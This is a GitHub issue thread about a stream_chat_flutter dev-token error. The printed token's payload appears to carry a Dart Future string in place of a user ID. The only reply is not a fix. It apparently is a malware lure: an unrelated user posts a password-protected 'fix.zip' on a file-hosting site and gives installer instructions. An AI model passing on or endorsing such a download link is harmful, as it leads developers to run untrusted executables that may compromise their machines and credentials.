### ISSUE TITLE
Error when using client.devToken("userId").rawValue

### ISSUE THREAD

**Issue by Ali-Farhoud** [GetStream/stream-chat-flutter#2009]
### Which packages are you using?

stream_chat_flutter

### On what platforms did you experience the issue?

iOS

### What version are you using?

stream_chat_flutter: ^8.0.0

### What happened?

In a development environment, I am generating tokens dynamically for my user using client.devToken('userId').rawValue.  like this : `final token = client.devToken(currentUserId).rawValue;
    final connectionFuture = await client.connectUser(
      currentChatUser,
      token, 
    );`

This shows the following error on my terminal : flutter: WebSocketError(message: JWTAuth error: illegal base64 data at input byte 47, data: ErrorResponse(code: 5, message: JWTAuth error: illegal base64 data at input byte 47, statusCode: 401, moreInfo: ))

I printed the output of toke.rawValue and it is : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoiSW5zdGFuY2Ugb2YgJ0Z1dHVyZTxpbnQ/PicifQ==.devtoken

### Steps to reproduce

```bash
1. Create a User : final currentChatUser = User(id: currentUserId);
2. Create Development token : final token = client.devToken(currentUserId).rawValue;
3. try to connect user : await client.connectUser(
      currentChatUser,
      token, 
    );
```

### Flutter doctor output

```shell
Doctor summary (to see all details, run flutter doctor -v):
[✓] Flutter (Channel stable, 3.22.3, on macOS 13.6.7 22G720 darwin-x64, locale en-QA)
[✓] Android toolchain - develop for Android devices (Android SDK version 34.0.0)
[✓] Xcode - develop for iOS and macOS (Xcode 15.0)
[✓] Chrome - develop for the web
[!] Android Studio (version unknown)
    ✗ Unable to determine Android Studio version.
[✓] Android Studio (version 2022.3)
[✓] VS Code (version 1.92.2)
[✓] Connected device (3 available)
```

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
